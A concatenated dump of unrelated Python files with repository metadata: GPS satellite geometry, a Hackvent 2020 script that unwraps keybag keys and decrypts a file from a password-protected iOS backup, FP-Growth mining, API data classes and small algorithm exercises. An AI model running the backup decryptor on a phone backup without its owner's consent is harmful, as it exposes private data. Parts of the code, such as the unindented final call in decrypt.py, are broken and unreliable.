        p_y*( lan_k_dot*np.cos(lan_k)*np.cos(i_k) - i_k_dot*np.sin(lan_k)*np.sin(i_k) )

    Vy_ecef = p_x*lan_k_dot*np.cos(lan_k) + \
        p_vx*np.sin(lan_k) + \
        p_vy*np.cos(lan_k)*np.cos(i_k) - \
        p_y*( lan_k_dot*np.sin(lan_k)*np.cos(i_k) + i_k_dot*np.cos(lan_k)*np.sin(i_k) )

    Vz_ecef = p_vy*np.sin(i_k) + p_y*i_k_dot*np.cos(i_k)

    # place into arrays (with astropy units) and return
    R_ecef = np.array([x_ecef, y_ecef, z_ecef]).reshape((3,1)) * u.meter
    V_ecef = np.array([Vx_ecef, Vy_ecef, Vz_ecef]).reshape((3,1)) * u.meter/u.second

    return R_ecef, V_ecef
def satelaz(r_sv_ecef, r_rx_ecef):
    """
    Compute satellite azimuth and elevation angle with respect to the
    receiver in ECEF.

    Inputs:
        r_sv_ecef (m) : 3x1 position vector of satellite in ECEF
        r_rx_ecef (m) : 3x1 position vector of receiver in ECEF

    Outputs:
        az (rad) : azimuth angle (measured from north toward east)
        el (rad) : elevation angle above the local horizon
    """
    # Compute satellite wrt receiver in ECEF
    r_sv_rx_ecef = r_sv_ecef - r_rx_ecef

    # transform relative vector to ENU at the receiver's geodetic location
    wgs84 = WGS84()
    lat, lon, h = wgs84.ecef_to_geodetic(r_rx_ecef)
    T_ecef_enu = wgs84.ecef_to_enu(lat, lon)
    r_sv_rx_enu = np.matmul(T_ecef_enu, r_sv_rx_ecef)

    # Compute azimuth and elevation from the ENU components
    east = r_sv_rx_enu[0,0]
    north = r_sv_rx_enu[1,0]
    up = r_sv_rx_enu[2,0]
    az = np.arctan2(east, north)
    # elevation = 90 deg minus the angle from zenith
    el = (0.5*np.pi * u.radian) - np.arccos( up / np.linalg.norm(r_sv_rx_enu) )

    return az, el
def satmap(navFile, r_rx_ecef, el_mask_deg, gpsWeek, gpsSecVec, navdir=DIR, plot_flag=False):
    """
    Generate plotting data for SV's above a particular
    receiver position over a span of GPS seconds.

    Inputs:
        navFile           : csv navigation file
        r_rx_ecef (m)     : 3x1 receiver position in ECEF
        el_mask_deg (deg) : elevation cutoff
        gpsWeek           : Gps week number
        gpsSecVec (s)     : Gps seconds array
        plot_flag         : flag to create sky plot (plot if True, via MATLAB)

    Outputs:
        svIds   : Unique SV ID numbers to be plotted
        sv_data : Nt*Nsv by 4 array in the form
                  [svId, gpsSec, el, az] per row (one row per visible
                  SV per epoch)
    """
    # 32 SVIDs in each navfile
    SVIDs = range(1,33)
    ephem = pd.read_csv(navdir + navFile)
    elrad = np.deg2rad(el_mask_deg) * u.radian

    # svIds will hold every SV seen above the mask at any epoch
    svIds = []
    # seed row; deleted after the loop (used only as a vstack initializer)
    sv_data = np.zeros(4)
    for gpsSec in gpsSecVec:
        for sv in SVIDs:
            if np.any(ephem['SVID'] == sv):
                # grab sat ecef position
                R_sat, V_sat = satloc(gpsWeek, gpsSec, sv, usefile=navFile)
                # grab azimuth, elevation from receiver
                az, el = satelaz(R_sat, r_rx_ecef)
                # check if equal to or above elevation threshold
                if el >= elrad:
                    if sv not in svIds:
                        svIds.append(sv)
                    data = [sv, gpsSec, el.value, az.value]
                    sv_data = np.vstack((sv_data, data))
    # delete first row, it was just used as a initializer
    sv_data = np.delete(sv_data, 0, 0)

    if plot_flag:
        # import matlab runner (hard-coded macOS MATLAB install path)
        sys.path.insert(1, '/Applications/MATLAB_R2020a.app')
        import matlab.engine
        try:
            eng = matlab.engine.start_matlab()
            satdata = ndarray2matlab(sv_data)
            eng.plotsat(satdata, float(gpsWeek), float(elrad), nargout=0)
            eng.quit()
        except Exception as e:
            print("\nSomething went wrong with MATLAB... here is the exception\n")
            print(e)

    return svIds, sv_data
def channel2navsol(gpsWeek, gpsSec, svID, sec_n=None, rx_ecef=None, createf=False):
    """Resolve an SV's ECEF position (and optionally its elevation) for a channel.

    Inputs:
        gpsWeek : GPS week number
        gpsSec  : GPS seconds of week used for the satloc computation
        svID    : satellite PRN number
        sec_n   : optional seconds value to use in the nav-file name instead
                  of gpsSec (file naming only; the state is still computed
                  at gpsSec)
        rx_ecef : optional 3x1 receiver ECEF position; when given, the SV
                  elevation relative to it is also returned
        createf : when True, (re)generate the nav-data CSV via MATLAB first

    Returns:
        r_sv_ecef                -- when rx_ecef is None
        (r_sv_ecef, el)          -- when rx_ecef is given
    """
    # first, get the data from the matlab script
    if createf:
        createNavDataCsv(gpsWeek, gpsSec)

    # pick the seconds value used in the nav-file name
    usesec = gpsSec
    # BUGFIX: `sec_n != None` / `rx_ecef != None` break when the caller passes
    # a NumPy array (elementwise comparison -> ambiguous truth value).
    # Identity checks against None are both correct and idiomatic.
    if sec_n is not None:
        usesec = sec_n

    if type(gpsSec) == float:
        navFile = 'gpsW_SOW_{}_{:.4f}_navData.csv'.format(int(gpsWeek), usesec)
    else:
        navFile = 'gpsW_SOW_{}_{}_navData.csv'.format(int(gpsWeek), usesec)

    # get position of SV
    r_sv_ecef, v_ecef = satloc(gpsWeek, gpsSec, svID, usefile=navFile)

    if rx_ecef is not None:
        az, el = satelaz(r_sv_ecef, rx_ecef)
        return r_sv_ecef, el

    return r_sv_ecef
def main():
    """Placeholder entry point; real functionality is used via imports."""
    print('Using satloc functionality...')


if __name__ == "__main__":
    main()
"william.fife@utexas.edu"
] | william.fife@utexas.edu |
579336648163e63ff39d3fbf581b6bad5c221ccf | 15a5387c4ad0327b4b08571e5f14fa83a0b686fd | /dec23/decrypt.py | a5b4873bd15ce0acf1f4ff57d33f1ee136ecd843 | [] | no_license | maennel/hackvent2020 | f0759d32a902aa7582e233233d45c84f1cc775c9 | 4b176d5ab322b205cd54e2325b2398e9fc51232e | refs/heads/master | 2023-02-10T23:10:53.643922 | 2021-01-04T15:42:33 | 2021-01-04T15:42:33 | 325,392,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,217 | py | #!/usr/bin/env python3.7
# coding: UTF-8
from __future__ import print_function
from __future__ import division
import argparse
import getpass
import os.path
import pprint
import random
import shutil
import sqlite3
import string
import struct
import tempfile
from binascii import hexlify
import Crypto.Cipher.AES # https://www.dlitz.net/software/pycrypto/
import biplist
import fastpbkdf2
from biplist import InvalidPlistException
def main():
    """Decrypt one file from an encrypted iOS backup and pretty-print it.

    Pipeline: parse CLI args -> load Manifest.plist -> unlock the keybag with
    the backup password -> decrypt Manifest.db -> look up the target file's
    metadata -> unwrap its per-file key -> decrypt and print the plist.
    """
    ## Parse options
    parser = argparse.ArgumentParser()
    parser.add_argument('--backup-directory', dest='backup_directory',
                        default='testdata/encrypted')
    parser.add_argument('--password-pipe', dest='password_pipe',
                        help="""\
Keeps password from being visible in system process list.
Typical use: --password-pipe=<(echo -n foo)
""")
    parser.add_argument('--no-anonymize-output', dest='anonymize',
                        action='store_false')
    args = parser.parse_args()
    # Module-level flag read by anonymize(); defaults to True (store_false).
    global ANONYMIZE_OUTPUT
    ANONYMIZE_OUTPUT = args.anonymize
    if ANONYMIZE_OUTPUT:
        print('Warning: All output keys are FAKE to protect your privacy')

    manifest_file = os.path.join(args.backup_directory, 'Manifest.plist')
    with open(manifest_file, 'rb') as infile:
        manifest_plist = biplist.readPlist(infile)
    keybag = Keybag(manifest_plist['BackupKeyBag'])
    # the actual keys are unknown, but the wrapped keys are known
    keybag.printClassKeys()

    if args.password_pipe:
        password = readpipe(args.password_pipe)
        if password.endswith(b'\n'):
            password = password[:-1]
    else:
        password = getpass.getpass('Backup password: ').encode('utf-8')

    ## Unlock keybag with password
    if not keybag.unlockWithPasscode(password):
        raise Exception('Could not unlock keybag; bad password?')
    # now the keys are known too
    keybag.printClassKeys()

    ## Decrypt metadata DB
    print(manifest_plist.keys())
    # ManifestKey layout: 4-byte little-endian protection class, then the
    # wrapped key itself.
    manifest_key = manifest_plist['ManifestKey'][4:]
    with open(os.path.join(args.backup_directory, 'Manifest.db'), 'rb') as db:
        encrypted_db = db.read()
    manifest_class = struct.unpack('<l', manifest_plist['ManifestKey'][:4])[0]
    key = keybag.unwrapKeyForClass(manifest_class, manifest_key)
    decrypted_data = AESdecryptCBC(encrypted_db, key)

    temp_dir = tempfile.mkdtemp()
    try:
        # Does anyone know how to get Python's SQLite module to open some
        # bytes in memory as a database?
        db_filename = os.path.join(temp_dir, 'db.sqlite3')
        with open(db_filename, 'wb') as db_file:
            db_file.write(decrypted_data)
        conn = sqlite3.connect(db_filename)
        conn.row_factory = sqlite3.Row
        c = conn.cursor()
        c.execute("""
            SELECT fileID, domain, relativePath, file
            FROM Files
            WHERE relativePath LIKE 'Media/PhotoData/MISC/DCIM_APPLE.plist'
            ORDER BY domain, relativePath""")
        results = c.fetchall()
    finally:
        # always remove the plaintext DB copy from disk
        shutil.rmtree(temp_dir)

    for item in results:
        fileID, domain, relativePath, file_bplist = item

        # The `file` column is itself a binary plist (NSKeyedArchiver-style);
        # follow $top.root into $objects for the file metadata.
        plist = biplist.readPlistFromString(file_bplist)
        file_data = plist['$objects'][plist['$top']['root'].integer]
        size = file_data['Size']
        protection_class = file_data['ProtectionClass']
        # EncryptionKey blob: skip the leading 4-byte class prefix.
        encryption_key = plist['$objects'][
            file_data['EncryptionKey'].integer]['NS.data'][4:]

        # Backup stores files in two-hex-char subdirectories of their ID.
        backup_filename = os.path.join(args.backup_directory,
                                       fileID[:2], fileID)
        with open(backup_filename, 'rb') as infile:
            data = infile.read()
        key = keybag.unwrapKeyForClass(protection_class, encryption_key)
        # truncate to actual length, as encryption may introduce padding
        decrypted_data = AESdecryptCBC(data, key)[:size]
        print('== decrypted data:')
        print(wrap(decrypted_data))
        print()

        print('== pretty-printed plist')
        pprint.pprint(biplist.readPlistFromString(decrypted_data))
##
# this section is mostly copied from parts of iphone-dataprotection
# http://code.google.com/p/iphone-dataprotection/

# TLV tags that belong to a per-class key entry in the keybag blob.
CLASSKEY_TAGS = [b"CLAS",b"WRAP",b"WPKY", b"KTYP", b"PBKY"] #UUID
# Human-readable names indexed by the keybag TYPE field (0-3).
KEYBAG_TYPES = ["System", "Backup", "Escrow", "OTA (icloud)"]
# Key type names indexed by the KTYP field.
KEY_TYPES = ["AES", "Curve25519"]
# iOS data-protection class id -> class name.
PROTECTION_CLASSES={
    1:"NSFileProtectionComplete",
    2:"NSFileProtectionCompleteUnlessOpen",
    3:"NSFileProtectionCompleteUntilFirstUserAuthentication",
    4:"NSFileProtectionNone",
    5:"NSFileProtectionRecovery?",

    6: "kSecAttrAccessibleWhenUnlocked",
    7: "kSecAttrAccessibleAfterFirstUnlock",
    8: "kSecAttrAccessibleAlways",
    9: "kSecAttrAccessibleWhenUnlockedThisDeviceOnly",
    10: "kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly",
    11: "kSecAttrAccessibleAlwaysThisDeviceOnly"
}
# Bits of the per-class WRAP field.
WRAP_DEVICE = 1
WRAP_PASSCODE = 2
class Keybag(object):
    """Parsed iOS backup keybag: global attributes plus per-class wrapped keys.

    Construct with the raw BackupKeyBag TLV blob; call unlockWithPasscode()
    to derive the passcode key and unwrap the per-class keys, then
    unwrapKeyForClass() to unwrap individual file keys.
    """

    def __init__(self, data):
        self.type = None
        self.uuid = None
        self.wrap = None
        self.deviceKey = None
        self.attrs = {}       # global keybag attributes (SALT, ITER, DPSL, ...)
        self.classKeys = {}   # protection class id -> class-key dict
        self.KeyBagKeys = None  # DATASIGN blob
        self.parseBinaryBlob(data)
        print(self.attrs)

    def parseBinaryBlob(self, data):
        """Walk the TLV stream, splitting global attrs from per-class keys.

        A second-and-later UUID tag starts a new class-key record; tags in
        CLASSKEY_TAGS attach to the current record, everything else is a
        global attribute.
        """
        currentClassKey = None

        for tag, data in loopTLVBlocks(data):
            if len(data) == 4:
                # 4-byte values are big-endian integers
                data = struct.unpack(">L", data)[0]
            if tag == b"TYPE":
                self.type = data
                if self.type > 3:
                    print("FAIL: keybag type > 3 : %d" % self.type)
            elif tag == b"UUID" and self.uuid is None:
                # first UUID is the keybag's own UUID
                self.uuid = data
            elif tag == b"WRAP" and self.wrap is None:
                self.wrap = data
            elif tag == b"UUID":
                # subsequent UUIDs start a new class-key record
                if currentClassKey:
                    self.classKeys[currentClassKey[b"CLAS"]] = currentClassKey
                currentClassKey = {b"UUID": data}
            elif tag in CLASSKEY_TAGS:
                currentClassKey[tag] = data
            else:
                self.attrs[tag] = data
        if currentClassKey:
            self.classKeys[currentClassKey[b"CLAS"]] = currentClassKey

    def unlockWithPasscode(self, passcode):
        """Derive the passcode key and unwrap all passcode-wrapped class keys.

        Returns False if any unwrap fails (wrong password), True otherwise.
        """
        # BUGFIX: this first PBKDF2 pass was commented out in the original,
        # leaving `passcode1` undefined (NameError). iOS 10.2+ backups use a
        # two-stage derivation: SHA-256 over the raw passcode with DPSL/DPIC,
        # then SHA-1 with SALT/ITER.
        passcode1 = fastpbkdf2.pbkdf2_hmac('sha256', passcode,
                                           self.attrs[b"DPSL"],
                                           self.attrs[b"DPIC"], 32)
        passcode_key = fastpbkdf2.pbkdf2_hmac('sha1', passcode1,
                                              self.attrs[b"SALT"],
                                              self.attrs[b"ITER"], 32)
        print('== Passcode key')
        print(anonymize(hexlify(passcode_key)))
        for classkey in self.classKeys.values():
            if b"WPKY" not in classkey:
                continue
            k = classkey[b"WPKY"]
            if classkey[b"WRAP"] & WRAP_PASSCODE:
                k = AESUnwrap(passcode_key, classkey[b"WPKY"])
                if not k:
                    # unwrap integrity check failed -> wrong passcode
                    return False
                classkey[b"KEY"] = k
        return True

    def unwrapKeyForClass(self, protection_class, persistent_key):
        """Unwrap a 0x28-byte wrapped file key with the given class key."""
        ck = self.classKeys[protection_class][b"KEY"]
        if len(persistent_key) != 0x28:
            raise Exception("Invalid key length")
        return AESUnwrap(ck, persistent_key)

    def printClassKeys(self):
        """Dump keybag metadata and per-class keys in a fixed-width table."""
        print("== Keybag")
        print("Keybag type: %s keybag (%d)" % (KEYBAG_TYPES[self.type], self.type))
        print("Keybag version: %d" % self.attrs[b"VERS"])
        print("Keybag UUID: %s" % anonymize(hexlify(self.uuid)))
        print("-"*209)
        print("".join(["Class".ljust(53),
                       "WRAP".ljust(5),
                       "Type".ljust(11),
                       "Key".ljust(65),
                       "WPKY".ljust(65),
                       "Public key"]))
        print("-"*208)
        for k, ck in self.classKeys.items():
            if k == 6:print("")
            print("".join(
                [PROTECTION_CLASSES.get(k).ljust(53),
                 str(ck.get(b"WRAP","")).ljust(5),
                 KEY_TYPES[ck.get(b"KTYP",0)].ljust(11),
                 anonymize(hexlify(ck.get(b"KEY", b""))).ljust(65),
                 anonymize(hexlify(ck.get(b"WPKY", b""))).ljust(65),
                 ]))
        print()
def loopTLVBlocks(blob):
    """Yield (tag, data) pairs from a keybag TLV stream.

    Each record is a 4-byte tag, a 4-byte big-endian length, then that many
    bytes of payload. Trailing bytes shorter than a header are ignored.
    """
    offset = 0
    total = len(blob)
    while offset + 8 <= total:
        tag = blob[offset:offset + 4]
        (size,) = struct.unpack(">L", blob[offset + 4:offset + 8])
        payload = blob[offset + 8:offset + 8 + size]
        yield (tag, payload)
        offset += 8 + size
def unpack64bit(s):
    """Decode an 8-byte big-endian buffer into an unsigned integer."""
    (value,) = struct.unpack(">Q", s)
    return value


def pack64bit(s):
    """Encode an integer as an 8-byte big-endian buffer."""
    return struct.pack(">Q", s)
def AESUnwrap(kek, wrapped):
    """Unwrap an AES-wrapped key with the key-encryption key *kek*.

    This follows the RFC 3394-style unwrap structure (6 rounds, 64-bit
    registers, 0xA6A6A6A6A6A6A6A6 integrity check) — TODO confirm exact
    conformance. Returns the unwrapped key bytes, or None if the integrity
    check fails (e.g. wrong kek / wrong password).

    NOTE(review): `Crypto.Cipher.AES.new(kek)` with no mode relies on legacy
    PyCrypto defaulting to ECB; pycryptodome requires an explicit mode —
    verify which library is installed.
    """
    # Split the wrapped blob into 64-bit big-endian words.
    C = []
    for i in range(len(wrapped)//8):
        C.append(unpack64bit(wrapped[i*8:i*8+8]))
    n = len(C) - 1
    R = [0] * (n+1)
    A = C[0]

    for i in range(1,n+1):
        R[i] = C[i]

    # 6 unwrap rounds, iterating blocks in reverse.
    for j in reversed(range(0,6)):
        for i in reversed(range(1,n+1)):
            todec = pack64bit(A ^ (n*j+i))
            todec += pack64bit(R[i])
            B = Crypto.Cipher.AES.new(kek).decrypt(todec)
            A = unpack64bit(B[:8])
            R[i] = unpack64bit(B[8:])

    # Integrity check: A must equal the fixed IV after unwrapping.
    if A != 0xa6a6a6a6a6a6a6a6:
        return None
    res = b"".join(map(pack64bit, R[1:]))
    return res
# BUGFIX: the IV must be bytes under Python 3 (was a str "\x00"*16).
ZEROIV = b"\x00" * 16


def AESdecryptCBC(data, key, iv=ZEROIV, padding=False):
    """AES-CBC decrypt *data* with *key* and *iv* (default all-zero IV).

    Input that is not a multiple of the 16-byte block size is truncated
    (with a warning) before decryption. With padding=True the result is
    passed through removePadding(16, ...).
    NOTE(review): removePadding is not defined anywhere in this file —
    the padding=True path will raise NameError; confirm where it lives.
    """
    if len(data) % 16:
        print("AESdecryptCBC: data length not /16, truncating")
        # BUGFIX: `/` yields a float in Python 3 and cannot index a slice;
        # use integer floor division.
        data = data[0:(len(data) // 16) * 16]
    data = Crypto.Cipher.AES.new(key, Crypto.Cipher.AES.MODE_CBC, iv).decrypt(data)
    if padding:
        return removePadding(16, data)
    return data
##
# here are some utility functions, one making sure I don’t leak my
# secret keys when posting the output on Stack Exchange

# Seeded RNG + memo table so the same input always maps to the same fake.
anon_random = random.Random(0)
memo = {}


def anonymize(s):
    """Return *s* (as bytes) or, when ANONYMIZE_OUTPUT is set, a stable fake
    of the same length drawn from the smallest alphabet covering *s*."""
    if type(s) == str:
        s = s.encode('utf-8')
    global anon_random, memo
    if not ANONYMIZE_OUTPUT:
        return s
    if s in memo:
        return memo[s]
    # Ordered from most to least restrictive; the final 256-char alphabet
    # always matches, so one of these is guaranteed to be picked.
    candidate_alphabets = [
        string.digits,
        string.digits + 'abcdef',
        string.ascii_letters,
        "".join(chr(x) for x in range(0, 256)),
    ]
    for candidate in candidate_alphabets:
        if all((chr(c) if type(c) == int else c) in candidate for c in s):
            alphabet = candidate
            break
    fake = "".join([anon_random.choice(alphabet) for _ in range(len(s))])
    memo[s] = fake
    return fake
def wrap(s, width=78):
    "Return a width-wrapped repr(s)-like string without breaking on \\’s"
    text = repr(s)
    quote = text[0]
    body = text[1:-1]
    chunks = []
    while body:
        # Cut before the last backslash inside the window unless a full-width
        # cut is already safe ("\x??" escapes are four characters long).
        cut = body.rfind('\\', 0, width)
        if cut <= width - 4:
            cut = width
        chunks.append(body[:cut])
        body = body[cut:]
    return '\n'.join("%s%s%s" % (quote, chunk, quote) for chunk in chunks)
def readpipe(path):
    """Read the entire contents of the named pipe (FIFO) at *path*.

    Raises Exception if *path* exists but is not a FIFO, so a password is
    never silently read from a regular file.
    """
    # BUGFIX: `stat` was referenced but never imported anywhere in this
    # file, so this function always raised NameError.
    import stat
    if stat.S_ISFIFO(os.stat(path).st_mode):
        with open(path, 'rb') as pipe:
            return pipe.read()
    else:
        raise Exception("Not a pipe: {!r}".format(path))
if __name__ == '__main__':
main()
| [
"mjeckelmann@gmail.com"
] | mjeckelmann@gmail.com |
b0d6aed1f1db0f7b5097cc2e16707e5b2225e718 | 33cb00ba2ce1fc763d20af2a27ca518c68f3ee8c | /FpGrowth.py | 80a12690bd8446326924dafa365c6faea60013a6 | [
"MIT"
] | permissive | MohanL/apriori-Fpgrowth | 50ac552ffad3992fa49c3da9412d0c6436238f18 | 8cc6477f7bc6c86224ca50775c8a46caa77ea07c | refs/heads/master | 2021-01-10T16:22:10.126249 | 2015-12-24T11:52:28 | 2015-12-24T11:52:28 | 44,637,957 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,526 | py | """
Description : Python implementation of FpGrowth Algorithm
Usage $python main.py -f [filename] -s [minSupport] -c [minConfidence]
"""
from treelib import Node, Tree
from collections import Counter
import operator
from optparse import OptionParser
globNumberOfTransactions = 0.0
globOriginalList = None
globMinSup = 0
globMinConf = 0
def readFile(filename):
    """Load a transaction file into module globals.

    Each line is a transaction of ", "-separated items; a trailing comma is
    stripped. Sets globNumberOfTransactions (line count) and
    globOriginalList (list of item sets) as side effects.
    """
    originalList = list()
    count = 0
    # BUGFIX: mode 'rU' was removed in Python 3.11, and the original never
    # closed the file handle; a context manager fixes both.
    with open(filename, 'r') as infile:
        for line in infile:
            count = count + 1
            line = line.strip().rstrip(',')
            record = set(line.split(', '))
            originalList.append(record)
    global globNumberOfTransactions
    globNumberOfTransactions = count
    global globOriginalList
    globOriginalList = originalList
def getSizeOneItemSet(originalList):
    """Flatten the transactions into one sorted list of items (duplicates kept)."""
    return sorted(item for transaction in originalList for item in transaction)
def priorityDic(objectList):
    """Return a Counter mapping each item to its frequency in *objectList*."""
    return Counter(objectList)
def FpGrowth(fName):
    """Build and display the FP-tree for the transaction file *fName*.

    Reads the file into globals, counts item frequencies, re-sorts each
    transaction by descending frequency, and inserts it into a treelib Tree
    rooted at "root". Nodes reuse an existing path where possible; a fresh
    node with a numeric id is created when the same item appears on a
    different branch.
    NOTE(review): the loop variables `set` and `tuple` shadow builtins —
    harmless here but worth renaming.
    """
    readFile(fName)
    Cone = getSizeOneItemSet(globOriginalList)
    priorityDict = priorityDic(Cone)
    #print(priorityDict)
    tree = Tree()
    tree.create_node("{}", "root")
    # reconstruct the whole transaction database based on the priority
    counter = 0  # supplies unique ids for duplicate-item nodes
    for set in globOriginalList:
        temp = dict()
        for element in set:
            priority = priorityDict.get(element)
            temp.update({element:priority})
        # sort the transaction's items by descending frequency
        sorted_temp = sorted(temp.items(), key=operator.itemgetter(1))
        sorted_temp.reverse()
        #print(sorted_temp)
        # construct Fp tree
        root = "root"
        for tuple in sorted_temp:
            if(not tree.contains(tuple[0])):
                # first occurrence of this item anywhere in the tree
                tree.create_node(tuple[0], tuple[0], root, 0)
                root = tuple[0]
            else:
                if tuple[0] in tree.is_branch(root):
                    #print("node already in this branch, don't know what to do")
                    #print("going down")
                    root = tuple[0]
                    #print(root)
                else:
                    #print("should create a duplicate node")
                    tree.create_node(tuple[0], counter, root, 0)
                    root = counter
                    # NOTE(review): increment placement reconstructed from a
                    # whitespace-mangled source — verify against the original.
                    counter += 1
            # I need to decide whether to create a new node or not
            # the condition is under this branch if this node exist
            # so I should check the root
    tree.show()
if __name__ == "__main__":
    # CLI front end: -f input file, -s minimum support, -c minimum confidence.
    optparser = OptionParser()
    optparser.add_option('-f', '--inputFile',
                         dest = 'inputFile',
                         help = 'data file',
                         default = "data/test.txt")
    optparser.add_option('-s','--minSupport',
                         dest = 'minSup',
                         help = 'Minimum Support',
                         default = 0.3,
                         type ='float')
    optparser.add_option('-c','--minConfidence',
                         dest = 'minConf',
                         help = 'Minimum Confidence',
                         default = 0.6,
                         type ='float')
    (options, args) = optparser.parse_args()

    fName = None
    if options.inputFile is None:
        fName = "240P1/adult.data"
    elif options.inputFile is not None:
        fName = options.inputFile

    # NOTE(review): these assignments create module-level names here, but
    # FpGrowth() below never reads them — support/confidence are unused.
    globMinSup = options.minSup
    globMinConf = options.minConf

    FpGrowth(fName)
| [
"mohan.liu.personal@gmail.com"
] | mohan.liu.personal@gmail.com |
402813e46363d893f713f9b23211050e901d6869 | 293f6cea829e02564c0623a3fcd7763ed1f5d6fd | /piplapis/data/available_data.py | b2ceeb63738aea86933643708e9d1e0390a3231e | [
"Apache-2.0"
] | permissive | ivosvetla88/piplapis-python | d6fdfee814ab4a1f7ba8fb4db7002dbec61d2ab0 | 7334de5fd0f815ec88905db2f95a59df80d6fbe5 | refs/heads/master | 2021-01-17T11:45:57.013803 | 2016-03-17T10:21:31 | 2016-03-17T10:21:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,439 | py | from piplapis.data.utils import Serializable
class AvailableData(Serializable):
    """Holds the basic/premium FieldCount summaries of an API response."""

    children = ('basic', 'premium')

    def __init__(self, basic=None, premium=None, *args, **kwargs):
        # Each child is either a FieldCount instance or None.
        self.basic = basic
        self.premium = premium

    def to_dict(self):
        """Serialize to a plain dict, keeping only populated FieldCount children."""
        result = {}
        if self.basic is not None and type(self.basic) == FieldCount:
            result['basic'] = self.basic.to_dict()
        if self.premium is not None and type(self.premium) == FieldCount:
            result['premium'] = self.premium.to_dict()
        return result

    @classmethod
    def from_dict(cls, d):
        """Build an AvailableData from a dict with optional 'basic'/'premium' keys."""
        instance = cls()
        raw_basic = d.get('basic')
        if raw_basic is not None:
            instance.basic = FieldCount.from_dict(raw_basic)
        raw_premium = d.get('premium')
        if raw_premium is not None:
            instance.premium = FieldCount.from_dict(raw_premium)
        return instance
class FieldCount(Serializable):
    children = ('addresses', 'ethnicities', 'emails', 'dobs', 'genders', 'user_ids', 'social_profiles',
                'educations', 'jobs', 'images', 'languages', 'origin_countries', 'names', 'phones',
                'relationships', 'usernames')

    def __init__(self, addresses=None, ethnicities=None, emails=None, dobs=None,
                 genders=None, user_ids=None, social_profiles=None, educations=None, jobs=None, images=None,
                 languages=None, origin_countries=None, names=None, phones=None, relationships=None,
                 usernames=None, *args, **kwargs):
        """
        A summary of the data within an API response

        :param addresses: int, the number of addresses
        :param ethnicities: int, the number of ethnicities
        :param emails: int, the number of emails
        :param dobs: int, the number of dobs
        :param genders: int, the number of genders
        :param user_ids: int, the number of user ids
        :param social_profiles: int, the number of social profile sources
        :param educations: int, the number of educations
        :param jobs: int, the number of jobs
        :param images: int, the number of images
        :param languages: int, the number of languages
        :param origin_countries: int, the number of origin countries
        :param names: int, the number of names
        :param phones: int, the number of phones
        :param relationships: int, the number of relationships
        :param usernames: int, the number of usernames
        """
        self.dobs = dobs
        self.images = images
        self.educations = educations
        self.addresses = addresses
        self.jobs = jobs
        self.genders = genders
        # NOTE: the original assigned self.ethnicities three times; once is enough.
        self.ethnicities = ethnicities
        self.phones = phones
        self.origin_countries = origin_countries
        self.usernames = usernames
        self.languages = languages
        self.emails = emails
        self.user_ids = user_ids
        self.relationships = relationships
        self.names = names
        self.social_profiles = social_profiles

    def to_dict(self):
        """Serialize to a dict containing only children with a positive count."""
        d = {}
        for child in self.children:
            value = getattr(self, child)
            # BUGFIX: `None > 0` raises TypeError under Python 3, and every
            # child defaults to None — guard explicitly.
            if value is not None and value > 0:
                d[child] = value
        return d

    @classmethod
    def from_dict(cls, d):
        """Build a FieldCount from a plain dict, keeping only known int children."""
        kwargs = {}
        # BUGFIX: dict.iteritems() is Python 2 only; items() works everywhere.
        for key, value in d.items():
            if key in cls.children and type(value) == int:
                kwargs[key] = value
        return cls(**kwargs)
| [
"josh.liberty@pipl.com"
] | josh.liberty@pipl.com |
a269a7226604cf187ef5653174f1c4c263b1f6a7 | 92dd6a174bf90e96895127bb562e3f0a05d6e079 | /apply dfs and bfs/섬나라 아일랜드.py | d24817c5606aba77e667c87bdc35fa782e3a2e65 | [] | no_license | 123qpq/inflearn_python | caa4a86d051d76bf5612c57ae9578f1925abc5a9 | 5904cedabea9d5bc4afa3f1f76911dfccce754b5 | refs/heads/main | 2023-03-12T05:14:06.162651 | 2021-02-28T14:03:58 | 2021-02-28T14:03:58 | 338,735,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | from collections import deque
n = int(input())
table = [list(map(int, input().split())) for _ in range(n)]
dx = [-1, -1, 0, 1, 1, 1, 0, -1]
dy = [0, 1, 1, 1, 0, -1, -1, -1]
q = deque()
cnt = 0
for i in range(n):
for j in range(n):
if table[i][j] == 1:
table[i][j] = 0
q.append((i, j))
while q:
now = q.popleft()
for a in range(8):
xx = now[0] + dx[a]
yy = now[1] + dy[a]
if 0 <= xx < n and 0 <= yy < n and table[xx][yy] == 1:
table[xx][yy] = 0
q.append((xx, yy))
cnt += 1
print(cnt) | [
"45002168+123qpq@users.noreply.github.com"
] | 45002168+123qpq@users.noreply.github.com |
6420eb175c932c58d4a7dbb0d816742e4b73a937 | 10e3f9659affb4c74280ee27a6e485c8d7e86c56 | /pySamples/testGetAttrCurrentMod.py | caf4f2d91dc7c82e451f01b45b68844100f9c59a | [] | no_license | benwei/Learnings | a52a751e6ba9bbbbf7b51b0e6b6ac5e839a87cd3 | e020698c2be16bf7eb1c7fb9bf19276165cc0400 | refs/heads/master | 2023-02-04T22:27:00.182020 | 2023-01-19T16:52:31 | 2023-01-19T16:57:43 | 1,994,139 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | import sys
def test():
print "getattr current mode run: test()"
o = getattr(sys.modules[__name__], 'test')
if o:
o()
| [
"ben@staros.mobi"
] | ben@staros.mobi |
b8650f08115fc04e8145f89e4f8811f0521fc19b | c4589dc8775e3005230b6a47a454d68d6725f7f4 | /twitter/mole/migrations/0001_initial.py | e950ff611a3d02afbec092873e6bb027a6b87505 | [] | no_license | mriverov/tip.twitter | 8338980bf81850265fdec5871e838af7c513b811 | 2790d6516d585f8693e9b44e1c0dfd50a1d89f5c | refs/heads/master | 2020-04-06T03:33:25.825610 | 2016-08-13T22:10:09 | 2016-08-13T22:10:09 | 19,164,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,715 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-13 05:05
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial auto-generated schema: KeyWord, Project, Trend, Tweet, User.

    NOTE(review): `null=True` on the ManyToMany `followers` field has no
    database effect and Django warns about it — confirm intent.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='KeyWord',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
